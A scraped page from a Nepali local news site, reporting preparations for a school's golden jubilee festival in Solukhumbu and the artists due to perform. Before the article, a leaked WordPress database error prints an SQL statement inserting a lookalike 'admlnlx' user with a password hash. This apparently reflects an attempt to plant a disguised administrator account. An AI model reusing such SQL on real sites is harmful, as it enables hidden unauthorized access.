WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpiUQm7TLfXIDjz.rslT//1R.Fpzfs1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 22:25:30', '', 'admlnlx', 'admlnlx')
गााउँले न्यूज, सोलुखुम्बु–१० पौष । “महोत्सबको शान गुणस्तरीय शिक्षा हाम्रो अभियान” मुल नाराका साथ सञ्चालन हुन लागेको हिमालय आधारभूत विद्यालयको स्वर्ण महोत्सबको तयारी अन्तिम चरणमा पुगेको छ ।
सोलुखुम्बु जिल्ला माप्य दुधकोशी गाउँपालिका वडा नं.७ स्थित हिमालय आधारभूत विद्यालयको स्वर्ण महोत्सव यहि पौष १३ देखि १६ सम्म विभिन्न खेलकुदको साथमा राष्ट्रिय कलाकाको बेजोड प्रस्तुति रहने स्वर्ण महोत्सव मूल आयोज कमिटिका सदस्य सचिब प्र.अ.नवराज राईले गाउँले न्यूजलाई जानकारी दिए ।
माप्य दुधकोशी गाउँपालिका वडा नं.७ हाकुला स्थित हिमालय आधारभूत विद्यालयको प्राङ्गनमा हुने महोत्सवमा चर्चित गायक/गायिका रेवत राई, मिना राई, कुमार प्रयास, बिनोद बिक्रम राई, खगेन्द्र नाछिरिङ, चन्द्रकला राई, मोडल सिर्जना किराती तथा चर्चित हास्य कलाकार उमेश राई “फुलन्देको आमा” को प्रस्तुति पौष १५ गते बेलुका गौरब राईको उत्घोषणमा रहने राईले जानकारी दिए ।